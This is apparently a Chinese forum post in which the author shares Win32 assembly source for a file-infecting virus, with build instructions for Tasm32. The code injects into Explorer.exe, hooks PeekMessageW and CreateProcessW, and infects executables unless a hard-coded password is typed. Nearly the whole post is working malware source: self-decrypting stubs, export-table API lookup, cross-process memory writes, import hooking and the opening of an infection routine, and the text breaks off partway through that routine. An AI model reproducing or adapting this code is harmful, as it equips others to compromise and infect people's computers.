代码放送【Win32 病毒汇编源码，WinXP下调试通过】

xieglt · 发表于 2016-11-19 23:27:45

马上注册，结交更多好友，享用更多功能^_^

您需要登录才可以下载或查看，没有账号？立即注册

x

本帖最后由 xieglt 于 2016-11-19 23:31 编辑

病毒简介：
本病毒搜索系统进程，搜到进程 Explorer.exe 后，将部分病毒代码注入到 Explorer.exe 的进程空间，
且挂接API PeekMessageW，PeekMessageW 函数时刻都在执行，因此病毒代码将立刻获取控制权。
然后将事先建立的内存映射文件打开，挂接API CreateProcessW 函数。
然后，当你想通过 explorer.exe 运行程序时，就会弹出如下对话框了。

当你点击“取消”时，你想要运行的程序将不会执行，当然，也不会感染程序。

当你输入密码错误时，将弹出如下消息框

你若选择是，将感染你的程序。

当你输入密码正确时，将弹出如下消息框，不感染文件，直接执行

如要测试，请注意以上说明。
密码是123456abcdef

下面一个是病毒代码。可以存成文件 Virus.asm
一个是头文件可以存成文件 Virus.inc

请用 Tasm32 , tLink32 编译链接

xieglt · 发表于 2016-11-19 23:28:52

.386
.MODEL FLAT

;包含头文件, Windows 结构申明
INCLUDE Virus.INC
INCLUDE WINDOWS.INC
INCLUDELIB IMPORT32.LIB

;病毒代码的大小
SIZE_OF_CODE = OFFSET _CodeTail - OFFSET _CodeHead

SELF_KEY_OFF = OFFSET selfFlag - OFFSET _CodeHead + 1

SIZE_OF_STR = OFFSET _BaseProcNameTail - OFFSET szGetProcAddress

;_NewStart相对于 _CodeHead 的偏移
NEW_START_OFF = OFFSET _NewStart - OFFSET _CodeHead

SIZE_OF_ENCODE = SIZE_OF_CODE - NEW_START_OFF
;PeekMessageW Hook 函数的大小
SIZE_OF_HOOK = OFFSET _PeekMessageW_HookTail - OFFSET _PeekMessageW_Hook
;CreateProcessW Hook 函数相对于 _CodeHead 的偏移
CPW_HOOK_OFF = OFFSET _CreateProcessW_Hook - OFFSET _CodeHead
;CreateProcessW 挂接代码相对于 _CodeHead 的偏移
CPW_CODE_OFF = OFFSET CPW_NewCode - OFFSET _CodeHead

SIZE_OF_EPC = OFFSET @f - OFFSET @a

IDC_EDIT_PASSWORD EQU 1000
IDC_BUTTON_OK EQU 1001
IDC_BUTTON_CANCEL EQU 1002
SIZE_OF_TEMPLATE = OFFSET _TemplateEnd - OFFSET _TemplateBegin

EXTRN VirtualProtect:PROC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC

.DATA
ddBuffer DD 0
szMsg DB "正常退出!",0
.CODE

_PushAddress MACRO  address
PUSH OFFSET address
ADD DWORD PTR [ESP],EBX
ENDM

_Main:
;当代码从本体开始执行时，必须先更改
;代码的页面保护属性
PUSH OFFSET ddBuffer
PUSH PAGE_EXECUTE_READWRITE
PUSH 04000H
PUSH OFFSET _Main
CALL VirtualProtect

PUSH 0
JMP _CodeHead
ALIGN 4

;病毒代码开始
_CodeHead:
NOP
PUSH EBP
MOV EBP,ESP
NOP
JZ _Start
JNZ _Start

selfFlag DB 0
szGetProcAddress DB "GetProcAddress",0
szCreateFileMappingA DB "CreateFileMappingA",0
szMapViewOfFile DB "MapViewOfFile",0
szGetLastError DB "GetLastError",0
szVirtualProtect0 DB "VirtualProtect",0,0
szMapFileName DB "LongliveChairmanMao",0
_BaseProcNameTail:
ALIGN 4

_Start:
SUB ESP,64
PUSHAD
CALL _MainDelta
_MainDelta:
POP EBX
SUB EBX,OFFSET _MainDelta

JZ _Continue
JNZ _Continue

;退出代码
_IsNotSelf:
MOV EAX,DWORD PTR [EBP + 4]
TEST EAX,EAX
JE _ErrorSerious

PUSH EBP
SUB DWORD PTR [ESP],48
PUSH PAGE_EXECUTE_READWRITE
PUSH 2000H
PUSH EAX
CALL DWORD PTR [EBP - 24]
TEST EAX,EAX
JE _ErrorSerious

MOV EDI,DWORD PTR [EBP + 4]
SUB EDI,5

MOV AL,dbDecodeKey[EBX]
LEA ESI,@f[EBX]
PUSH SIZE_OF_EPC
POP ECX

PUSH ECX
PUSH ESI
_DecodeEntryPoint:
XOR BYTE PTR [ESI],AL
INC ESI
LOOP _DecodeEntryPoint

POP ESI
POP ECX
MOV EAX,EDI
REP MOVSB

LEA EDI,_GotoEntryPoint[EBX]
INC EDI
STOSD

; POP DWORD PTR FS:[0]
; ADD ESP,4
POPAD
MOV ESP,EBP
POP EBP
ADD ESP,4
_GotoEntryPoint:
MOV EAX,0FFFFFFFFH
JMP EAX
_ErrorSerious:
; 严重错误发生，结束程序
; POP DWORD PTR FS:[0]
; ADD ESP,4
POPAD
MOV ESP,EBP
POP EBP
ADD ESP,4
RET

PUSH 0
CALL ExitProcess

dbDecodeKey DB 0

_Continue:
; [EBP] old EBP
; [EBP - 4] kernel32.dll module
; [EBP - 8] GetProcAddress
; [EBP - 12] CreateFileMappingA
; [EBP - 16] MapViewOfFile
; [EBP - 20] GetLastError
; [EBP - 24] VirtualProtect
; [EBP - 28] Mapping file Handle
; [EBP - 32] view of mapping file
MOV EAX,DWORD PTR [EBP + 8]
OR ECX,0FFFFFFFFH
MOV EDI,EAX
SHR EDI,1
SHL EDI,1
STD
_ModuleHeaderNotFound:
MOV AX,NT_SIGN
REPNE SCASW
MOV EDX,EDI
INC EDX
INC EDX
MOV AX,DOS_SIGN
REPNE SCASW
INC EDI
INC EDI
MOV EAX,[EDI].IDH_lfanew
ADD EAX,EDI
XOR EAX,EDX
JZ _ModuleHeaderIsFound
MOV EDI,EDX
DEC EDI
DEC EDI
JMP _ModuleHeaderNotFound
_ModuleHeaderIsFound:
CLD
MOV DWORD PTR [EBP - 4],EDI
LEA ESI,selfFlag[EBX]
XOR EAX,EAX
LODSB
LEA ECX,_BaseProcNameTail[EBX]
SUB ECX,ESI
_FirstDecode:
XOR BYTE PTR [ESI],AL
INC ESI
LOOP _FirstDecode
MOV EAX,EDI
ADD EDI,[EDI].IDH_lfanew
MOV EDI,[EDI].INH_OptionalHeader.IOH_DataDirectory[0].IDD_VirtualAddress
ADD EDI,EAX
MOV ECX,[EDI].IED_AddressOfNameOrdinals
ADD ECX,EAX
MOV DWORD PTR [EBP - 8],ECX
MOV ECX,[EDI].IED_AddressOfFunctions
ADD ECX,EAX
MOV DWORD PTR [EBP - 12],ECX
MOV ECX,[EDI].IED_NumberOfNames
MOV DWORD PTR [EBP - 16],ECX
MOV ESI,[EDI].IED_Name
ADD ESI,EAX
LEA EDI,szGetProcAddress[EBX]
XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
NOT ECX
MOV DWORD PTR [EBP - 20],ECX
SUB EDI,ECX
XCHG EDI,ESI
XOR EDX,EDX
_CheckStringLength:
INC EDX
CMP EDX,DWORD PTR [EBP - 16]
JG _ErrorSerious
XOR ECX,ECX
DEC ECX
REPNE SCASB
NOT ECX
CMP ECX,DWORD PTR [EBP - 20]
JNE _CheckStringLength
SUB EDI,ECX
PUSH ESI
REPE CMPSB
POP ESI
JCXZ _ProcIsFound
ADD EDI,ECX
JMP _checkStringLength
_ProcIsFound:
DEC EDX
DEC EDX
MOV EDI,DWORD PTR [EBP - 8]
SHL EDX,1
MOV DX,WORD PTR [EDI + EDX]
AND EDX,0FFFFH
SHL EDX,2
MOV EDI,DWORD PTR [EBP - 12]
MOV EAX,DWORD PTR [EDI + EDX]
ADD EAX,DWORD PTR [EBP - 4]
MOV DWORD PTR [EBP - 8],EAX
MOV ESI,EBP
SUB ESI,12
LEA EDI,szCreateFileMappingA[EBX]
_GetBaseAPIs:
PUSH EDI
PUSH DWORD PTR [EBP - 4]
CALL DWORD PTR [EBP - 8]
TEST EAX,EAX
JE _ErrorSerious
MOV DWORD PTR [ESI],EAX
SUB ESI,4
XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
MOV AL,BYTE PTR [EDI]
TEST EAX,EAX
JNE _GetBaseAPIs

_PushAddress szMapFileName
PUSH 010000H
PUSH 0
PUSH PAGE_EXECUTE_READWRITE
PUSH NULL
PUSH -1
CALL DWORD PTR [EBP - 12]

TEST EAX,EAX
JE _ErrorSerious

MOV DWORD PTR [EBP - 28],EAX
CALL DWORD PTR [EBP - 20]
CMP EAX,ERROR_ALREADY_EXISTS
JE _IsNotSelf

PUSH 0
PUSH 0
PUSH 0
PUSH FILE_MAP_WRITE
PUSH DWORD PTR [EBP - 28]
CALL DWORD PTR [EBP - 16]
TEST EAX,EAX
JE _ErrorSerious

MOV DWORD PTR [EBP - 32],EAX
MOV EDI,EAX
LEA ESI,_CodeHead[EBX]
MOV ECX,SIZE_OF_CODE

PUSH EDI
REP MOVSB
POP EDI

ADD EDI,NEW_START_OFF
MOV AL,dbDecodeKey[EBX]
PUSH SIZE_OF_ENCODE
POP ECX
_SecondDecode:
XOR BYTE PTR [EDI],AL
INC EDI
LOOP _SecondDecode

_PushAddress _IsNotSelf
PUSH NEW_START_OFF
POP EAX
ADD EAX,DWORD PTR [EBP - 32]
JMP EAX

_NewStart:
PUSH EBX
CALL _NewDelta
_NewDelta:
POP EBX
SUB EBX,OFFSET _NewDelta

PUSH DWORD PTR [EBP - 12]
POP ddCreateFileMappingA[EBX]

;获得Kernel32.dll中需要用到的API
_PushAddress ddLoadLibraryA
_PushAddress szLoadLibraryA
PUSH DWORD PTR [EBP - 8]
PUSH DWORD PTR [EBP - 4]
CALL _GetAllProc
TEST EAX,EAX
JZ _NewEnd

;获得User32.dll的地址
_PushAddress szUser32
CALL ddLoadLibraryA[EBX]
TEST EAX,EAX
JZ _NewEnd

;获得User32.dll中需要用到的API
_PushAddress ddMessageBoxA
_PushAddress szMessageBoxA
PUSH DWORD PTR [EBP - 8]
PUSH EAX
CALL _GetAllProc

TEST EAX,EAX
JZ _NewEnd

;查找进程 Explorer.exe 获得进程ID
_PushAddress szExplorer
CALL _SearchForProcess

TEST EAX,EAX
JZ _NewEnd

;打开进程Explorer.exe以及获得其Module
_PushAddress ddExplorerHandle
_PushAddress ddExplorerModule
PUSH EAX
CALL _OpenProcessAndGetModule

TEST EAX,EAX
JZ _NewEnd

;在进程Explorer.exe中搜索API PeekMessageW的引入地址
PUSH ddPeekMessageW[EBX]
_PushAddress szUser32
CALL _SearchForImportAPI
TEST EAX,EAX
JZ _NewEnd
MOV DWORD PTR [EBP - 36],EAX

;在进程Explorer.exe中搜索足够写入挂接代码的空闲空间
PUSH SIZE_OF_HOOK
CALL _SearchForFreeSpace
TEST EAX,EAX
JZ _NewEnd
MOV DWORD PTR [EBP - 40],EAX

CALL _PrepareForInject
TEST EAX,EAX
JE _NewEnd

MOV DWORD PTR [EBP - 44],EAX

;将代码注入进程Explorer.exe
PUSH DWORD PTR [EBP - 36]
PUSH DWORD PTR [EBP - 40]
CALL _InjectProcess

TEST EAX,EAX
JE _NewEnd

PUSH -1
PUSH DWORD PTR [EBP - 44]
CALL ddWaitForSingleObject[EBX]

PUSH DWORD PTR [EBP - 44]
CALL ddCloseHandle[EBX]

; _PushAddress szTestFile
; CALL _InfectExeFile
_NewEnd:
POP EBX
RET

;***********************************************************************
; 函数声明:_GetAllProc PROC stdcall,DWORD,DWORD,DWORD,DWORD
;
; 功能:获取全部所需API
;
; 参数: 1:HMODULE of DLLs (Kernel32.dll,user32.dll)
; 2:address of GetProcAddress
; 3:name of APIs
; 4:buffer for store APIs' address
;***********************************************************************
_GetAllProc PROC
PUSH EBP
MOV EBP,ESP
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
MOV EDI,DWORD PTR [EBP + 16]
MOV ESI,DWORD PTR [EBP + 20]
_GetOneProc:
PUSH EDI
PUSH DWORD PTR [EBP + 8]
CALL DWORD PTR [EBP + 12]
TEST EAX,EAX
JE _GetAllProcExit
XCHG ESI,EDI
STOSD
XCHG ESI,EDI
XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
MOV AL,BYTE PTR [EDI]
TEST EAX,EAX
JNE _GetOneProc
INC EAX
_GetAllProcExit:
POP EDI
POP ESI
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
RET 16
_GetAllProc ENDP

;***********************************************************************
;***********************************************************************
_StringLength PROC
PUSH EBP
MOV EBP,ESP

PUSH ECX
PUSH EDI

MOV EDI,DWORD PTR [EBP + 8]

XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
NOT ECX
MOV EAX,ECX

POP EDI
POP ECX
MOV ESP,EBP
POP EBP
RET 4
_StringLength ENDP
;***********************************************************************
; 函数名称： _UCaseString
; 功能描述：将一个字符串中的小写字母转换成大写
; 入口参数： EDI = 字符串指针
; 返回值： NONE
; 处理概要：遍历字符串，当字符>='a' 且 <='z' 时，字符 -= 32
;***********************************************************************
_UCaseString PROC
PUSH EBP
MOV EBP,ESP

PUSH ECX
PUSH EDI

MOV EDI,DWORD PTR [EBP + 8]

PUSH EDI
CALL _StringLength

MOV ECX,EAX
PUSH ECX
_UCaseLoop:
MOV AL,BYTE PTR [EDI]
CMP AL,'a'
JL _IsNotLCase
CMP AL,'z'
JG _IsNotLCase
SUB AL,32
_IsNotLCase:
STOSB
LOOP _UCaseLoop
POP EAX

POP EDI
POP ECX

MOV ESP,EBP
POP EBP
RET 4
_UCaseString ENDP

;***********************************************************************
;***********************************************************************
_StringCompare PROC
PUSH EBP
MOV EBP,ESP

PUSH ECX
PUSH ESI
PUSH EDI

MOV EDI,DWORD PTR [EBP + 8]
MOV ESI,DWORD PTR [EBP + 12]

PUSH ESI
CALL _UCaseString
MOV ECX,EAX

PUSH EDI
CALL _StringLength
SUB EAX,ECX
JNZ _ExitCompare

REPE CMPSB

JCXZ _ExitCompare
INC EAX
_ExitCompare:
POP EDI
POP ESI
POP ECX

MOV ESP,EBP
POP EBP
RET 8
_StringCompare ENDP

;***********************************************************************
;***********************************************************************
_SearchForProcess PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,8
SUB ESP,SIZE PROCESS_ENTRY32

PUSH EDI

PUSH 0
PUSH TH32CS_SNAPPROCESS
CALL ddCreateToolhelp32Snapshot[EBX]
TEST EAX,EAX
JE _ErrorProcessSnapshot

MOV DWORD PTR [EBP - 4],EAX
PUSH 0
POP DWORD PTR [EBP - 8]

MOV EDI,EBP
SUB EDI,8
SUB EDI,SIZE PROCESS_ENTRY32

MOV [EDI].PE_dwSize,SIZE PROCESS_ENTRY32
PUSH EDI
PUSH EAX
CALL ddProcess32First[EBX]
_ContinueSearch:
TEST EAX,EAX
JE _ProcessNotFound

PUSH EDI
ADD DWORD PTR [ESP],36
PUSH DWORD PTR [EBP + 8]
CALL _StringCompare
TEST EAX,EAX
JE _ProcessIsFound

PUSH EDI
PUSH DWORD PTR [EBP - 4]
CALL ddProcess32Next[EBX]
JMP _ContinueSearch
_ProcessIsFound:
PUSH [EDI].PE_th32ProcessID
POP DWORD PTR [EBP - 8]
_ProcessNotFound:
PUSH DWORD PTR [EBP - 4]
CALL ddCloseHandle[EBX]
MOV EAX,DWORD PTR [EBP - 8]
_ErrorProcessSnapshot:
POP EDI
MOV ESP,EBP
POP EBP
RET 4
_SearchForProcess ENDP

;***********************************************************************
;***********************************************************************
_OpenProcessAndGetModule PROC
PUSH EBP
MOV EBP,ESP

SUB ESP,8
SUB ESP,SIZE MODULE_ENTRY32

PUSH EDI

PUSH DWORD PTR [EBP + 8]
PUSH TH32CS_SNAPMODULE
CALL ddCreateToolhelp32Snapshot[EBX]

TEST EAX,EAX
JE _ErrorModuleSnapshot

MOV DWORD PTR [EBP - 4],EAX
PUSH 0
POP DWORD PTR [EBP - 8]

MOV EDI,EBP
SUB EDI,8
SUB EDI,SIZE MODULE_ENTRY32

MOV [EDI].PE_dwSize,SIZE MODULE_ENTRY32
PUSH EDI
PUSH EAX
CALL ddModule32First[EBX]

TEST EAX,EAX
JE _GetModuleError

MOV EAX,DWORD PTR [EBP + 12]
PUSH [EDI].ME_hModule
POP DWORD PTR [EAX]

PUSH DWORD PTR [EBP + 8]
PUSH 0
PUSH PROCESS_OPEN_ACCESS
CALL ddOpenProcess[EBX]
TEST EAX,EAX
JE _GetModuleError

PUSH EAX
MOV EAX,DWORD PTR [EBP + 16]
POP DWORD PTR [EAX]
PUSH 1
POP DWORD PTR [EBP - 8]
_GetModuleError:
PUSH DWORD PTR [EBP - 4]
CALL ddCloseHandle[EBX]
MOV EAX,DWORD PTR [EBP - 8]
_ErrorModuleSnapshot:
POP EDI
MOV ESP,EBP
POP EBP
RET 12
_OpenProcessAndGetModule ENDP

;***********************************************************************
;***********************************************************************
_SearchForImportAPI PROC
PUSH EBP
MOV EBP,ESP

SUB ESP,8

PUSH ECX
PUSH ESI
PUSH EDI

;取得DLL模块名的字符串长
PUSH DWORD PTR [EBP + 8]
CALL _StringLength
MOV DWORD PTR [EBP - 8],EAX

CALL _ReadProcessNtHeader
TEST EAX,EAX
JE _APINotFound
;读取函数导入表
MOV ESI,EDI
ADD ESI,078H
ADD ESI,SIZE IMAGE_DATA_DIRECTORY
PUSH [ESI].IDD_VirtualAddress
POP ESI
ADD ESI,ddExplorerModule[EBX]
ADD EDI,SIZE IMAGE_NT_HEADERS

_SearchImportTable:
PUSH SIZE IMAGE_IMPORT_DESCRIPTOR
POP ECX
CALL _ReadProcessMemory
TEST EAX,EAX
JE _APINotFound

PUSH [EDI].IID_Name
POP EAX
TEST EAX,EAX
JE _APINotFound

PUSH ESI
PUSH EDI

MOV ECX,DWORD PTR [EBP - 8]
MOV ESI,ddExplorerModule[EBX]
ADD ESI,EAX

PUSH DWORD PTR [EDI].IID_FirstThunk
POP DWORD PTR [EBP - 4]

CALL _ReadProcessMemory
TEST EAX,EAX
JNE _CheckDllName
ADD ESP,8
JMP _APINotFound

_CheckDllName:
XOR EAX,EAX
PUSH EDI
ADD EDI,DWORD PTR [EBP - 8]
STOSB
POP EDI

PUSH EDI
PUSH DWORD PTR [EBP + 8]
CALL _StringCompare
TEST EAX,EAX
JE _ImportTableIsFound

POP EDI
POP ESI
ADD ESI,SIZE IMAGE_IMPORT_DESCRIPTOR
JMP _SearchImportTable

_ImportTableIsFound:
MOV ESI,DWORD PTR [EBP - 4]
ADD ESI,ddExplorerModule[EBX]

_SearchThunkData:
PUSH SIZE IMAGE_THUNK_DATA32
POP ECX
CALL _ReadProcessMemory
TEST EAX,EAX
JE _APINotFound

MOV EAX,[EDI].ITD_Function
TEST EAX,EAX
JE _APINotFound

SUB EAX,DWORD PTR [EBP + 12]
JZ _APIIsFound
ADD ESI,SIZE IMAGE_THUNK_DATA32
JMP _SearchThunkData

_APIIsFound:
MOV EAX,ESI

_APINotFound:
POP EDI
POP ESI
POP ECX

MOV ESP,EBP
POP EBP
RET 8
_SearchForImportAPI ENDP

;***********************************************************************

_SearchForFreeSpace PROC
PUSH EBP
MOV EBP,ESP

SUB ESP,8

PUSH ECX
PUSH EDX
PUSH ESI
PUSH EDI

CALL _ReadProcessNtHeader

MOVZX EAX,[EDI].INH_FileHeader.IFH_NumberOfSections
MOV DWORD PTR [EBP - 4],EAX

ADD EDI,SIZE IMAGE_NT_HEADERS
ADD ESI,SIZE IMAGE_NT_HEADERS

;计算该Section中的剩余空间
;在磁盘上，PE文件的每个Section的大小总是FileAlignment的整数倍
;这个值存在于 [IMAGE_SECTION_HEADER].ISH_SizeOfRawData 中
;在载入内存后，每个Section的大小总是SectionAlignment的整数倍
;所以，剩余空间的计算方法为:
;SizeOfRawData/SectionAlignment
;总空间 = 商*SectionAlignment + (余数 == 0 ? 0 : SectionAlignment)
;剩余空间 = 总空间 - [IMAGE_SECTION_HEADER].ISH_VirtualSize
_SearchSectionTable:
PUSH SIZE IMAGE_SECTION_HEADER
POP ECX
CALL _ReadProcessMemory
TEST EAX,EAX
JE _NoFreeSpace

PUSH EDI

MOV EAX,[EDI].ISH_SizeOfRawData
SUB EDI,SIZE IMAGE_NT_HEADERS
PUSH [EDI].INH_OptionalHeader.IOH_SectionAlignment
POP DWORD PTR [EBP - 8]
XOR EDX,EDX
DIV DWORD PTR [EBP - 8]
ADD DX,0FFFFH
ADC EAX,0
MUL DWORD PTR [EBP - 8]

POP EDI
SUB EAX,[EDI].ISH_VirtualSize

CMP EAX,DWORD PTR [EBP + 8]
JGE _FreeSpaceIsFound

MOV ECX,DWORD PTR [EBP - 4]
DEC ECX
JCXZ _NoFreeSpace

ADD ESI,SIZE IMAGE_SECTION_HEADER
JMP _SearchSectionTable
_FreeSpaceIsFound:
MOV EAX,ddExplorerModule[EBX]
ADD EAX,[EDI].ISH_VirtualAddress
ADD EAX,[EDI].ISH_VirtualSize

_NoFreeSpace:
POP EDI
POP ESI
POP EDX
POP ECX

MOV ESP,EBP
POP EBP
RET 4
_SearchForFreeSpace ENDP

;***********************************************************************
_PrepareForInject PROC

PUSH DWORD PTR [EBP - 16]
POP DWORD PTR ddMapViewOfFile_Host[EBX]

PUSH 7
POP ECX
LEA ESI,ddCreateProcessW[EBX]
LEA EDI,ddCreateProcessW_Host[EBX]
REP MOVSD

;保存CreateProcessW的原始代码
MOV ESI,ddCreateProcessW[EBX]
LEA EDI,CPW_OldCode[EBX]
PUSH 7
POP ECX
REP MOVSB

_PushAddress szEventName
PUSH 0
PUSH 1
PUSH NULL
CALL ddCreateEventA[EBX]

RET
_PrepareForInject ENDP

;***********************************************************************
_InjectProcess PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,4

PUSH ECX
PUSH ESI
PUSH EDI

;a(c,d) push d,push c call a
;取参数1
MOV EAX,DWORD PTR [EBP + 8]
AND EAX,0FFFFF000H

PUSH EBP
SUB DWORD PTR [ESP],4
PUSH PAGE_EXECUTE_READWRITE
PUSH 02000H
PUSH EAX
PUSH ddExplorerHandle[EBX]
CALL ddVirtualProtectEx[EBX]
TEST EAX,EAX
JE _InJectFailed

PUSH SIZE_OF_HOOK
POP ECX
_PushAddress _PeekMessageW_Hook
POP EDI
PUSH DWORD PTR [EBP + 8]
POP ESI
CALL _WriteProcessMemory
TEST EAX,EAX
JE _InjectFailed

MOV EAX,DWORD PTR [EBP + 12]
AND EAX,0FFFFF000H

PUSH EBP
SUB DWORD PTR [ESP],4
PUSH PAGE_EXECUTE_READWRITE
PUSH 02000H
PUSH EAX
PUSH ddExplorerHandle[EBX]
CALL ddVirtualProtectEx[EBX]
TEST EAX,EAX
JE _InJectFailed

PUSH 4
POP ECX
MOV EDI,EBP
ADD EDI,8
PUSH DWORD PTR [EBP + 12]
POP ESI
CALL _WriteProcessMemory

_InjectFailed:
POP EDI
POP ESI
POP ECX

MOV ESP,EBP
POP EBP
RET 8
_InjectProcess ENDP

;***********************************************************************
_ReadProcessNtHeader PROC
;读取EXPLORER.EXE的 DOS 头
PUSH SIZE IMAGE_DOS_HEADER
POP ECX
LEA EDI,ddGlobalBuffer[EBX]
MOV ESI,ddExplorerModule[EBX]
CALL _ReadProcessMemory
TEST EAX,EAX
JE _ReadError

;读取EXPLORER.EXE的 NT 头
PUSH SIZE IMAGE_NT_HEADERS
POP ECX
ADD ESI,DWORD PTR [EDI].IDH_lfanew
CALL _ReadProcessMemory
_ReadError:
RET
_ReadProcessNtHeader ENDP

;***********************************************************************
; 函数名称： _ReadProcessMemory
; 功能描述：将API ReadProcessMemory 封装一下
; 入口参数： ECX = 读取字节数
; ESI = 目标进程中的读取地址
; EDI = 读出数据存放的缓冲区
; 返回值： EAX = 0 失败， 1 成功
; 处理概要：
;***********************************************************************
_ReadProcessMemory PROC
PUSH NULL
PUSH ECX
PUSH EDI
PUSH ESI
PUSH ddExplorerHandle[EBX]
CALL ddReadProcessMemory[EBX]
RET
_ReadProcessMemory ENDP

;***********************************************************************
; 函数名称： _WriteProcessMemory
; 功能描述：将API WriteProcessMemory 封装一下
; 入口参数： ECX = 写入字节数
; ESI = 目标进程中的写入地址
; EDI = 写入数据存放的缓冲区
; 返回值： EAX = 0 失败， 1 成功
; 处理概要：
;***********************************************************************
_WriteProcessMemory PROC
PUSH NULL
PUSH ECX
PUSH EDI
PUSH ESI
PUSH ddExplorerHandle[EBX]
CALL ddWriteProcessMemory[EBX]
RET
_WriteProcessMemory ENDP

;***********************************************************************

;***********************************************************************
_ShowDWORD PROC
PUSH EBP
MOV EBP,ESP

SUB ESP,12

PUSH EAX
PUSH ECX
PUSH EDI
PUSHF

STD

MOV EDI,EBP
DEC EDI

MOV AL,0
STOSB
MOV AL,'H'
STOSB

MOV EAX,DWORD PTR [EBP+8]
MOV ECX,8

_Hex2Ascii:
PUSH EAX
AND AL,0FH
ADD AL,030H
CMP AL,039H
JLE _IsNumber
ADD AL,7
_IsNumber:
STOSB
POP EAX
SHR EAX,4
LOOP _Hex2Ascii

MOV AL,'X'
STOSB
MOV AL,'0'
STOSB

INC EDI
CLD

PUSH 0
PUSH 0
PUSH EDI
PUSH 0
MOV EAX,DWORD PTR [EBP+12]
TEST EAX,EAX
JNZ _ProcFromStack
CALL MessageBoxA
JMP _ProcFromImport
_ProcFromStack:
CALL EAX
_ProcFromImport:
POPF
POP EDI
POP ECX
POP EAX

ADD ESP,12
MOV ESP,EBP
POP EBP
RET 8
_ShowDWORD ENDP

;***********************************************************************

_GetExeFileName PROC
PUSH EBP
MOV EBP,ESP

PUSH ECX
PUSH ESI
PUSH EDI

MOV ESI,DWORD PTR [EBP + 12]
MOV EDI,DWORD PTR [EBP + 8]

PUSH ESI
CALL _StringLength
MOV ECX,EAX

XOR EAX,EAX

LODSB
SUB AL,022H
XCHG EAX,ECX
JCXZ _DelFirstChar
DEC ESI
_DelFirstChar:
XCHG EAX,ECX
PUSH ECX
REP MOVSB
POP ECX
SUB EDI,ECX
MOV AL,022H
REPNE SCASB
JCXZ _IsLastChar
DEC EDI
MOV BYTE PTR [EDI],0
_IsLastChar:

POP EDI
POP ESI
POP ECX

MOV ESP,EBP
POP EBP
RET 8
_GetExeFileName ENDP

;***********************************************************************
_CPW_OldCodeStore PROC
PUSH 7
POP ECX
MOV EDI,ddCreateProcessW_Host[EBX]
LEA ESI,CPW_OldCode[EBX]
REP MOVSB
RET
_CPW_OldCodeStore ENDP

;***********************************************************************
_RandNumber PROC
PUSH EBP
MOV EBP,ESP
PUSH EDX
CALL ddGetTickCount[EBX]
XOR EDX,EDX
MUL DWORD PTR [EBP + 8]
ADD EAX,DWORD PTR [EBP + 12]
ADC EDX,0
DIV DWORD PTR [EBP + 16]
XCHG EAX,EDX
ADD EAX,1
POP EDX
MOV ESP,EBP
POP EBP
RET 12
_RandNumber ENDP
;***********************************************************************

_Align2Number PROC
PUSH EBP
MOV EBP,ESP

MOV EAX,DWORD PTR [EBP + 8]
XOR EDX,EDX

DIV DWORD PTR [EBP + 12]
ADD DX,0FFFFH
ADC EAX,0

MUL DWORD PTR [EBP + 12]

MOV ESP,EBP
POP EBP
RET 8
_Align2Number ENDP

;***********************************************************************
_IsNotInfect PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH ESI
PUSH EDI

MOV ESI,DWORD PTR [EBP + 8]
PUSH [ESI].INH_OptionalHeader.IOH_AddressOfEntryPoint
PUSH ESI
CALL _GetRawFromRVA
MOV DWORD PTR [EBP - 4],EAX

PUSH 8
POP ECX

MOV ESI,EAX
ADD ESI,DWORD PTR [EBP + 12]

LEA EDI,_EntryPointCode[EBX]
REPE CMPSB
JCXZ _LikeIt

XOR EAX,EAX
JMP _IsNotInfectExit
_LikeIt:
LODSD
ADD EAX,5

MOV ESI,DWORD PTR [EBP + 8]
ADD EAX,[ESI].INH_OptionalHeader.IOH_AddressOfEntryPoint

PUSH EAX
PUSH ESI
CALL _GetRawFromRVA

PUSH 5
POP ECX

MOV ESI,EAX
ADD ESI,DWORD PTR [EBP + 12]
LEA EDI,_CodeHead[EBX]

XOR EAX,EAX
INC EAX
REPE CMPSB
JCXZ _IsNotInfectExit
DEC EAX
_IsNotInfectExit:
POP EDI
POP ESI
MOV ESP,EBP
POP EBP
RET 8
_IsNotInfect ENDP

;***********************************************************************
_GetNtHeader PROC
MOV WORD PTR AX,[ESI].IDH_magic
CMP AX,DOS_SIGN
JNE _InvalidPEFile

;定位到NT头
ADD ESI,[ESI].IDH_lfanew
MOV DWORD PTR EAX,[ESI].INH_Signature
CMP EAX,NT_SIGN
JNE _InvalidPEFile

MOV EAX,ESI
RET
_InvalidPEFile:
XOR EAX,EAX
RET
_GetNtHeader ENDP

;***********************************************************************
_GetRawFromRVA PROC
PUSH EBP
MOV EBP,ESP

PUSH ECX
PUSH EDX
PUSH ESI
PUSH EDI

MOV ESI,DWORD PTR [EBP + 8]
MOV EAX,DWORD PTR [EBP + 12]

MOV EDI,ESI
ADD EDI,SIZE IMAGE_NT_HEADERS

MOVZX ECX,[ESI].INH_FileHeader.IFH_NumberOfSections
_SearchForRVA:
MOV EDX,[EDI].ISH_VirtualAddress
CMP EAX,EDX
JL _RVANotFound
ADD EDX,[EDI].ISH_SizeOfRawData
CMP EAX,EDX
JLE _RVAIsFound
ADD EDI,SIZE IMAGE_SECTION_HEADER
LOOP _SearchForRVA
_RVAIsFound:
SUB EAX,[EDI].ISH_VirtualAddress
ADD EAX,[EDI].ISH_PointerToRawData
JMP _RawExit
_RVANotFound:
XOR EAX,EAX
_RawExit:
POP EDI
POP ESI
POP EDX
POP ECX

MOV ESP,EBP
POP EBP
RET 8
_GetRawFromRVA ENDP

;***********************************************************************
;[EBP - 4] 文件属性
;[EBP - 8] 文件句柄
;[EBP - 12] 映射文件句柄
;[EBP - 16] 内存映射指针
;[EBP - 20] 文件大小（或对齐后大小）
;[EBP - 24] 病毒代码对齐后大小
;[EBP - 28] 病毒代码的入口地址
;[EBP - 32]
;[EBP - 36]
;[EBP - 36 - SIZE IMAGE_SECTION_HEADER]
_InfectExeFile PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,36
SUB ESP,SIZE IMAGE_SECTION_HEADER

;取得文件属性
PUSH DWORD PTR [EBP + 8]
